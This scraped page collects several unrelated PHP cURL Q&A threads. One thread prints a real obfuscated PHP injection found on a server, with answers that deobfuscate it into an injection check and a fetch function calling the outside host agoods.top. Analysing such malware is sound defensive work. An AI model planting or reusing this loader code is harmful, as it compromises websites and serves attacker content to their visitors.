Why can't get JSON data from PHP? - php

I have a webpage that exposes some public interfaces that are accessed like a simple AJAX call from other pages. Example:
http://domain1.com/interface/function.php:
$json['result'] = ... // fill with data
$json['ok'] = true;
echo json_encode($json);
http://domain2.com/application.php:
$call = 'http://domain1.com/interface/function.php';
$curl = curl_init($call);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
$call_data = curl_exec($curl);
$error = curl_error($curl);
curl_close($curl);
print_r($error);
print_r($call_data);
The problem is $call_data is empty. I already try to use *file_get_contents()* and other curl parameters without success. Also, if I change first line in application.php by:
$call = 'http://www.google.com/';
$call_data gets the right file content (Google home page content, of course). More, *curl_error()* doesn't return any error. What's happening? Why?


I had the same thing last weekend.
If you have some htaccess file or similar thing that unifies the url of the service proveider and adds / or makes some kind of redirection this might cause you the problem - both curl_exec($curl); and curl_error($curl); will be empty strings.


from the PHP curl_exec manual:
Returns TRUE on success or FALSE on failure. However, if the CURLOPT_RETURNTRANSFER option is set, it will return the result on success, FALSE on failure.
are you sure that you've set the CURLOPT_RETURNTRANSFER to true?

Related

How to deobfuscate a PHP code that is written as below? [closed]

Closed. This question needs to be more focused. It is not currently accepting answers.
Want to improve this question? Update the question so it focuses on one problem only by editing this post.
Closed 1 year ago.
Improve this question
I have seen this code added to the server file. It looks like it is a malicious code, I can't seem a way to deobfuscate/decrypt this code.
<?php
#header('Content-Type:text/html;charset=utf-8');
error_reporting(0); $OOOOOO="%71%77%65%72%74%79%75%69%6f%70%61%73%64%66%67%68%6a%6b%6c%7a%78%63%76%62%6e%6d%51%57%45%52%54%59%55%49%4f%50%41%53%44%46%47%48%4a%4b%4c%5a%58%43%56%42%4e%4d%5f%2d%22%3f%3e%20%3c%2e%2d%3d%3a%2f%31%32%33%30%36%35%34%38%37%39%27%3b%28%29%26%5e%24%5b%5d%5c%5c%25%7b%7d%21%2a%7c%2b%2c";
global $O;
$O=urldecode($OOOOOO);
if($_GET[$O{21}.$O{15}.$O{2}.$O{24}]==$O{69}.$O{64}.$O{53}.$O{21}.$O{24}){
$oooOoOoOoooOooOOooooo = file_get_contents(__FILE__);
$oooOoOoOoOoooooOOooo = explode($O{58}.$O{55}.$O{9}.$O{15}.$O{9},$oooOoOoOoooOooOOooooo);
if(strpos($oooOoOoOoOoooooOOooo[1],'%71%77%65')!==false){
echo $O{81}.$O{8}.$O{17}.$O{88}.$O{82};
exit;
}else{
echo $O{81}.$O{13}.$O{10}.$O{7}.$O{18}.$O{88}.$O{82};
exit;
}
}
$oOooOO='z0807_1';
$oOooOOoO=$O{15}.$O{4}.$O{4}.$O{9}.$O{62}.$O{63}.$O{63}.$oOooOO.$O{59}.$O{10}.$O{14}.$O{8}.$O{8}.$O{12}.$O{11}.$O{59}.$O{4}.$O{8}.$O{9};
function ooooooooOOOOOOOOoooooOOO($oooOOOoOoo){
$ooooOOOooOo=curl_init();
curl_setopt ($ooooOOOooOo, CURLOPT_URL, $oooOOOoOoo);curl_setopt ($ooooOOOooOo, CURLOPT_RETURNTRANSFER, 1);curl_setopt ($ooooOOOooOo, CURLOPT_CONNECTTIMEOUT, 5);$oooooOOOOooO = curl_exec($ooooOOOooOo);
curl_close($ooooOOOooOo);
return $oooooOOOOooO;
}

You can unravel this step by step.
There is this $OOOOOO string which then URL-decoded into $O, which yields the following (which looks like going through the keyboard row by row):
$O = "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM_-\"?> <.-=:/1230654879';()&^$[]\\%{}!*|+,";
From then on, in many places characters of this string are accessed (using the lesser-known and by now also deprecated braces syntax for array index access) and used to build new strings. We can replace all these $O{x} bits with the actual characters (I used a regex replace):
if($_GET["c"."h"."e"."n"]=="5"."1"."-"."c"."n"){
$oooOoOoOoooOooOOooooo = file_get_contents(__FILE__);
$oooOoOoOoOoooooOOooo = explode("<"."?"."p"."h"."p",$oooOoOoOoooOooOOooooo);
if(strpos($oooOoOoOoOoooooOOooo[1],'%71%77%65')!==false){
echo "["."o"."k"."!"."]";
exit;
}else{
echo "["."f"."a"."i"."l"."!"."]";
exit;
}
}
$oOooOO='z0807_1';
$oOooOOoO="h"."t"."t"."p".":"."/"."/".$oOooOO."."."a"."g"."o"."o"."d"."s"."."."t"."o"."p";
function ooooooooOOOOOOOOoooooOOO($oooOOOoOoo){
$ooooOOOooOo=curl_init();
curl_setopt ($ooooOOOooOo, CURLOPT_URL, $oooOOOoOoo);curl_setopt ($ooooOOOooOo, CURLOPT_RETURNTRANSFER, 1);curl_setopt ($ooooOOOooOo, CURLOPT_CONNECTTIMEOUT, 5);$oooooOOOOooO = curl_exec($ooooOOOooOo);
curl_close($ooooOOOooOo);
return $oooooOOOOooO;
}
We can then combine those strings to make them more readable:
if($_GET["chen"]=="51-cn"){
$oooOoOoOoooOooOOooooo = file_get_contents(__FILE__);
$oooOoOoOoOoooooOOooo = explode("<?php",$oooOoOoOoooOooOOooooo);
if(strpos($oooOoOoOoOoooooOOooo[1],'%71%77%65')!==false){
echo "[ok!]";
exit;
}else{
echo "[fail!]";
exit;
}
}
$oOooOO='z0807_1';
$oOooOOoO="http://".$oOooOO.".agoods.top";
function ooooooooOOOOOOOOoooooOOO($oooOOOoOoo){
$ooooOOOooOo=curl_init();
curl_setopt ($ooooOOOooOo, CURLOPT_URL, $oooOOOoOoo);curl_setopt ($ooooOOOooOo, CURLOPT_RETURNTRANSFER, 1);curl_setopt ($ooooOOOooOo, CURLOPT_CONNECTTIMEOUT, 5);$oooooOOOOooO = curl_exec($ooooOOOooOo);
curl_close($ooooOOOooOo);
return $oooooOOOOooO;
}
Now let's rename the confusing variables:
if($_GET["chen"]=="51-cn"){
$varA = file_get_contents(__FILE__);
$varB = explode("<?php",$varA);
if(strpos($varB[1],'%71%77%65')!==false){
echo "[ok!]";
exit;
}else{
echo "[fail!]";
exit;
}
}
$varC='z0807_1';
$varD="http://".$varC.".agoods.top";
function someFunction($varE){
$varF=curl_init();
curl_setopt ($varF, CURLOPT_URL, $varE);curl_setopt ($varF, CURLOPT_RETURNTRANSFER, 1);curl_setopt ($varF, CURLOPT_CONNECTTIMEOUT, 5);$varG = curl_exec($varF);
curl_close($varF);
return $varG;
}
Next, let's split up the long line inside of the function:
if($_GET["chen"]=="51-cn"){
$varA = file_get_contents(__FILE__);
$varB = explode("<?php",$varA);
if(strpos($varB[1],'%71%77%65')!==false){
echo "[ok!]";
exit;
}else{
echo "[fail!]";
exit;
}
}
$varC='z0807_1';
$varD="http://".$varC.".agoods.top";
function someFunction($varE){
$varF=curl_init();
curl_setopt ($varF, CURLOPT_URL, $varE);
curl_setopt ($varF, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($varF, CURLOPT_CONNECTTIMEOUT, 5);
$varG = curl_exec($varF);
curl_close($varF);
return $varG;
}
As a final step, we can guess better names for those variables:
if($_GET["chen"]=="51-cn"){
$thisFileSource = file_get_contents(__FILE__);
$parts = explode("<?php",$thisFileSource);
if(strpos($parts[1],'%71%77%65')!==false){
echo "[ok!]";
exit;
}else{
echo "[fail!]";
exit;
}
}
$subdomain='z0807_1';
$url="http://".$subdomain.".agoods.top";
function sendRequest($url){
$curl=curl_init();
curl_setopt ($curl, CURLOPT_URL, $url);
curl_setopt ($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($curl, CURLOPT_CONNECTTIMEOUT, 5);
$result = curl_exec($curl);
curl_close($curl);
return $result;
}
As for what this code does: If this is called with query parameter chen=51-cn in the URL, it checks if the current file contains the start of that $OOOOOO string in the first PHP code section, and if it does, it returns [ok!], otherwise [fail!]. (This sounds entirely useless to me, because if the code wouldn't exist, then it wouldn't run either, so just echo "[ok!]"; would have sufficed...) Additionally, it prepares a request to http://z0807_1.agoods.top but it's never executed, at least not in the piece of code that you showed. (Maybe it's executed elsewhere in your code at some other place where code got injected too! Could be worth looking for ooooooooOOOOOOOOoooooOOO.)
Googling for "agoods.top" reveals a lot of seemingly unrelated sites that include in their contents what appears to be various PHP errors like Warning: mysqli::__construct(): (HY000/1040): Too many connections in /www/wwwroot/z0930_1.agoods.top/connect2.php on line 7. (How ironic, given that in the injected code, error output is suppressed.) Browsing these sites (which I did with a lot of care, so you don't have to!) shows that some of them act maliciously, for example redirecting the user to a fake "browser update" page after a few seconds, and many are just down by now. This makes me believe that those are also hijacked sites, and that the code was supposed to eventually pull HTML from the attacker's sites on zXXXX_X.agoods.top and inject it into the page, but the attacker messed up and also delivered PHP errors that way which ended up in Google's cache.

Because i always wonder what to expect if this would happen to me
i looked up what this code does.
First the commented code, and below the comments only.
DO NOT execute this on your machine!
// Sets header ...
#header('Content-Type:text/html;charset=utf-8');
// Disables error reporting (sure to not trigger notifications on owner side).
error_reporting(0);
// Sets a char string: qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM_-"?\> <.-=:/1230654879';()&^$[]\\%{}!*|+,
// ^ escaped by me
$OOOOOO="%71%77%65%72%74%79%75%69%6f%70%61%73%64%66%67%68%6a%6b%6c%7a%78%63%76%62%6e%6d%51%57%45%52%54%59%55%49%4f%50%41%53%44%46%47%48%4a%4b%4c%5a%58%43%56%42%4e%4d%5f%2d%22%3f%3e%20%3c%2e%2d%3d%3a%2f%31%32%33%30%36%35%34%38%37%39%27%3b%28%29%26%5e%24%5b%5d%5c%5c%25%7b%7d%21%2a%7c%2b%2c";
// Sets $O global (makes no sense to me).
global $O;
// decodes the url encoded string "qwertyuiopasdf...".
$O=urldecode($OOOOOO);
// $_GET['chen'] == '51-cn'
if($_GET[$O{21}.$O{15}.$O{2}.$O{24}]==$O{69}.$O{64}.$O{53}.$O{21}.$O{24}){
// Load this file into var.
$oooOoOoOoooOooOOooooo = file_get_contents(__FILE__);
// Explode by "<?php" (makes no sense to me).
$oooOoOoOoOoooooOOooo = explode($O{58}.$O{55}.$O{9}.$O{15}.$O{9},$oooOoOoOoooOooOOooooo);
// If "%71%77%65" is found in loaded file (part) (so if we loaded the "hacked" file)
if(strpos($oooOoOoOoOoooooOOooo[1],'%71%77%65')!==false){
// then echo "[ok!]" and exit
echo $O{81}.$O{8}.$O{17}.$O{88}.$O{82};
exit;
}else{
// else echo "[fail!]" and exit
echo $O{81}.$O{13}.$O{10}.$O{7}.$O{18}.$O{88}.$O{82};
exit;
}
}
// Following function got not called by provided code.
// I think its to load more code into the project.
// (I disabled the curl lines btw.)
// Set sub domain on var.
$oOooOO='z0807_1';
// Set url "http://z0807_1.agoods.top" on var.
$oOooOOoO=$O{15}.$O{4}.$O{4}.$O{9}.$O{62}.$O{63}.$O{63}.$oOooOO.$O{59}.$O{10}.$O{14}.$O{8}.$O{8}.$O{12}.$O{11}.$O{59}.$O{4}.$O{8}.$O{9};
function ooooooooOOOOOOOOoooooOOO($oooOOOoOoo){
// Init curl.
#$ooooOOOooOo=curl_init();
// Set url (given function param).
#curl_setopt ($ooooOOOooOo, CURLOPT_URL, $oooOOOoOoo);
// CURLOPT_RETURNTRANSFER = 1 to not echo out response.
#curl_setopt ($ooooOOOooOo, CURLOPT_RETURNTRANSFER, 1);
// 5 sec connection timeout.
#curl_setopt ($ooooOOOooOo, CURLOPT_CONNECTTIMEOUT, 5);
// Execute and set response to NEW var.
#$oooooOOOOooO = curl_exec($ooooOOOooOo);
#curl_close($ooooOOOooOo);
// Return new var content.
#return $oooooOOOOooO;
}
Here the "just comments" part.
// Sets header ...
// Disables error reporting (sure to not trigger notifications on owner side).
// Sets a char string: qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM_-"?\> <.-=:/1230654879';()&^$[]\\%{}!*|+,
// Sets $O global (makes no sense to me).
// decodes the url encoded string "qwertyuiopasdf...".
// $_GET['chen'] == '51-cn'
// Load this file into var.
// Explode by "<?php" (makes no sense to me).
// If "%71%77%65" is found in loaded file (part) (so if we loaded the "hacked" file)
// then echo "[ok!]" and exit
// else echo "[fail!]" and exit
// Following function got not called by provided code.
// I think its to load more code into the project.
// (I disabled the curl lines btw.)
// Set sub domain on var.
// Set url "http://z0807_1.agoods.top" on var.
// Init curl.
// Set url (given function param).
// CURLOPT_RETURNTRANSFER = 1 to not echo out response.
// 5 sec connection timeout.
// Execute and set response to NEW var.
// Return new var content.
So this looks to me like
not the complete code that got injected
done by a bot that checks if the injection was successfully
a script to load more bad code into your project on deamand.
Lets hope you just got "marked" somewhere as "found" - so nothing really happened yet.
But i dont know that.

php curl requesting twice

I have a limit of 25 requests/min from PUBGs official API. For some reason instead of it requesting twice for each search its using up 4 requests. I can't figure out why. I have checked that the code isn't running twice. Only once, but still it's requesting 4 times.
UPDATE:
I tried making a separate page and apparently there is a bug somewhere calling my function twice. Still don't know why but I'm now 99% sure it's not the function itself.
Code For My Request
function getProfile($profileName, $region, $seasonDate){
// Just check if there is an acctual user
if($profileName === null){
$data->error = "Player Not Found";
$data->noUser = true;
return $data;
}else{
$season = "division.bro.official.".$seasonDate;
/*
Get The UserID
*/
$ch = curl_init("https://api.pubg.com/shards/$region/players?filter[playerNames]=$profileName");
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
'Authorization: Bearer APIKEY',
'Accept: application/vnd.api+json'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$rawData = json_decode(curl_exec($ch), true);
$data->playerId = $rawData["data"][0]["id"];
curl_close($ch);
// Testing if user exists
if($rawData["errors"][0]["title"] === "Not Found"){
$data->noUser = true;
$data->error = "Player Not Found";
return $data;
}else{
/*
Get The acctual stats
*/
$ch = curl_init("https://api.pubg.com/shards/$region/players/$data->playerId/seasons/$season");
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
'Authorization: Bearer APIKEY',
'Accept: application/vnd.api+json'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$data->playerDataJSON = curl_exec($ch);
$data->playerData = json_decode($data->playerDataJSON, true);
curl_close($ch);
return $data;
}
}
}
This is how it's getting called
if (isset($_POST['search-username'])) {
$username = $_POST['search-username'];
header("Location: /profile/$username/pc-na/2018-01/overall/tpp");
die();
}
In The actual profile php
$data = getProfile($page_parts[1], $page_parts[2], $page_parts[3]);

absolutely sure it's only called once? set a lock on it. change it to
function getProfile($profileName, $region, $seasonDate){
static $once=true;
if($once!==true){
throw new \LogicException("tried to run getProfile() twice!");
}
$once=false;

Shortly after I figure out it's not the function I realized that the culprit was an empty script I was calling. I knew this script created an error which I didn't really care about since it was empty and I had no idea why it was creating the error. For some obscure reason this script created the error. I'll just make a lesson out of it to always fix the smallest errors.

I've also been seeing this behavior - a script with a single curl_exec() request gets called twice.
The strange thing is this was only happening when running on localhost (under a wampp installation) but when run from any other webserver was fine and it is just called once.
I never managed to debug it completely but it seems to be an issue with the local server so test elsewhere if you are seeing this.

Can't get data out of variable

I've made a curl request. I put the curl instructions in one class function:
class Curly {
var $data;
function GetRequest($url) {
$ch = curl_init();
$timeout = 5;
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
$this->data = curl_exec($ch);
curl_close($ch);
//this is what i was missing --> return $this->data;
}
I put the database query in another class function.
include('class.curly.php');
class mongoSearchForInfoOnEsd {
public function getEsdsFbInfo($esdID) {
$mongoApiKey = "xx";
$requestParams= "xx";
$url = "xx";
$fbInfo = (new Curly)->GetRequest($url);
//this is what i was missing --> return $fbInfo;
}
In the index.php, an HTTP post from a webhook is coming through, in which parsing through some strings to obtain 2 ids is handled. I then send one of those ids to the mongodb curl request, everything goes good. The correct response comes back, I only know this b/c of the var_dump of the var_dump in the curly class....BUT in the index file I'm struggling to get to get the data out of the var and assign its values to any variable I want.
How can I get the data out? I know its there, but where?
I'm so stuck.
# get ytID from http post
#get EsdID from http post
$httpPostData = file_get_contents('php://input');
$postDataDecoded = urldecode($httpPostData);
$ytID = substr($postDataDecoded, strpos($postDataDecoded, "docid=") + strlen("docid="), );
$esdID = substr($postDataDecoded, strpos($postDataDecoded, "m\": \"") + strlen ("m\": "),;
*$esdData = (new mongoSearchForInfoOnEsd)->getEsdsFbInfo("$esdID");*
$obj = json_decode($esdData, true);
echo $obj;
OK, I've added return and I can see the data, but no operations are working on returned data.
edit ---> put return in both classes, now its fully operational.

As lazyhammer said you need to write the following in the end of your method GetRequest($url)
return $this->data;
Also, in a class, a function is called a method.
To be more explicit.
var_dump doesn't return the data. it's only sending them to the client(your browser) which will display it.
to return the data computed in your method back to the caller, you need to use the keyword return at the end of your method.
When your computer will see return he bring back the data to the caller. it means everything you write after return won't be executed.

Just because you are assigning a value to the class variable data doesn't mean that value is being returned when you call the function getRequest. Therefore, in order to use the data from an outside class, you need to return the final value:
function GetRequest($url){
$ch = curl_init();
$timeout = 5;
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
$this->data = curl_exec($ch);
curl_close($ch);
return $this->data;
}
You may not even need to keep the variable $data around, unless there is more to your code that you are not showing, you could simply return curl_exec($ch)
To further answer your question from your comments below, this is from php.net:
This function displays structured information about one or more expressions that includes its type and value. Arrays and objects are explored recursively with values indented to show structure.
As you can see, var_dump is used for display purposes only.

trying to run a CURL script in wordpress

I'm trying to run a CURL script in wordpress but I'm having a problem.
When i test it, i get a 500 internal error as WP changes the URL.
So the script is at www.site.com/curl_script.php - When i test that (navigate to www.site.com/curl_script.php) I end up going to www.site.com/curl_script.php/wp-admin/install.php which returns a 500 internal error.
Now after playing around with the script, I've noticed the problem. It seems to be a function that I'm running (the curl function) thats causing wordpress to take me to that url.
Ive had similar issues to this but have managed to fix it by simply changing the names of the functions, but this doesn't seem to work anymore.
The function:
function verify_user($ref, $username, $uu_name){
$ch = curl_init($server_root);
curl_setopt($ch,CURLOPT_URL,"http://site.com/con1.php");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch,CURLOPT_POSTFIELDS,$fields_string);
curl_setopt($ch, CURLOPT_POST, 1);
$result = curl_exec($ch);
$data = json_decode($result);
global $ref_;
$ref_ = $data->ref_id;
//fetch some more info
$chh = curl_init($server_root);
curl_setopt($chh,CURLOPT_URL,"http://site.com/con2.php");
curl_setopt($chh, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($chh, CURLOPT_POST, 1);
$resultt_2 = curl_exec($chh);
$data_custt = json_decode($resultt_2);
$cust_st = $data__->user_status;
if ($cust_st == "FAILED"){
echo "this is bad";
}
elseif ($cust_st == "PASSED") {
echo "this is good";
}
}
}
Now when i call this function:
verify_user_info($ref, $username, $uu_name);
Wordpress plays up...
But when i leave the function out (don't call it), everything works fine.
It seems that WP is assuming the user is attempting to run the installation, when that's not the case.
Any ideas on how to fix this, dynamically as others will use this script too?

If sounds like you are getting redirected somehow, even though should shouldn't be if CURLOPT_FOLLOWLOCATION is not set. Try using the curl_getinfo function to debug the URL that is being accessed.

Callback from API not happening after posting parameters to API URL from server side

API integration description
The API needs a form to be posted to the API URL with some input fields and a customer token. The API processes and then posts response to a callback.php file on my server. I can access the posted vals using $_POST in that file. That's all about the existing method and it works fine.
Requirement
To hide the customer token value from being seen from client side. So I started with sending server side post request.
Problem
I tried with many options but the callback is not happening -
1) CURL method
$ch = curl_init(API_URL);
$encoded = '';
$_postArray['customer_token'] = API_CUSTOMER_TOKEN;
foreach($_postArray as $name => $value)
{
$encoded .= urlencode($name).'='.urlencode($value).'&';
}
// chop off last ampersand
$encoded = substr($encoded, 0, strlen($encoded)-1);
curl_setopt($ch, CURLOPT_HEADER, false);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $encoded);
$resp = curl_exec($ch);
curl_close($ch);
echo $resp;
$resp echoes 1 if the line curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); is removed but the callback does not happen. I am setting a session variable in the callback script to verify.Is it needed that the API be synchronous in order to use curl method, so that curl_exec returns the response?
2) without CURL as given in Posting parameters to a url using the POST method without using a form
But the callback is not happening.
I tried with the following code too, but looks like my pecl is not installed properly because the HttpRequest() is not defined.
$req = new HttpRequest($apiUrl, HttpRequest::METH_POST);
$req->addQueryData($params);
try
{
$r->send();
if ($r->getResponseCode() == 200)
{
echo "success";
// success!
}
else
{
echo "failure";
// got to the API, the API returned perhaps a RESTful response code like 404
}
}
catch (HttpException $ex)
{
// couldn't get to the API (probably)
}
Please help me out! I just need to easily send a server side post request and get the response in the callback file.

Try to debug your request using the curl_get_info() function:
$header = curl_getinfo($ch);
print_r($header);
Your request might be OK but it my result in an error 404.
EDIT: If you want to perform a post request, add this to your code:
curl_setopt($ch, CURLOPT_POST, true);
EDIT: Something else I mentioned at your code: You used a '1' at the 'CURLOPT_RETURNTRANSFER' but is should be 'true':
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
At least this is how I usually do it, and you never know if the function will also understand a '1' as 'true';
EDIT: The real problem: I copy-pasted your source and used it on one of my pages getting this error:
Warning: urlencode() expects parameter 1 to be string, array given in C:\xampp\htdocs\phptests\test.php on line 8
The error is in this line:
foreach($_postArray as $name => $value)
$_postArray is an array with one value holding the other values and you need either another foreach or you simple use this:
foreach($_postArray['customer_token'] as $name => $value)

As discussed in the previous question, the callback is an entirely separate thing from your request. The callback also will not have your session variables, because the remote API is acting as the client to the callback script and has its own session.
You should really show some API documentation here. Maybe we're misunderstanding each other but as far as I can see, what you are trying to do (get the callback value in the initial CURL request) is futile, and doesn't become any less futile by asking twice.

Categories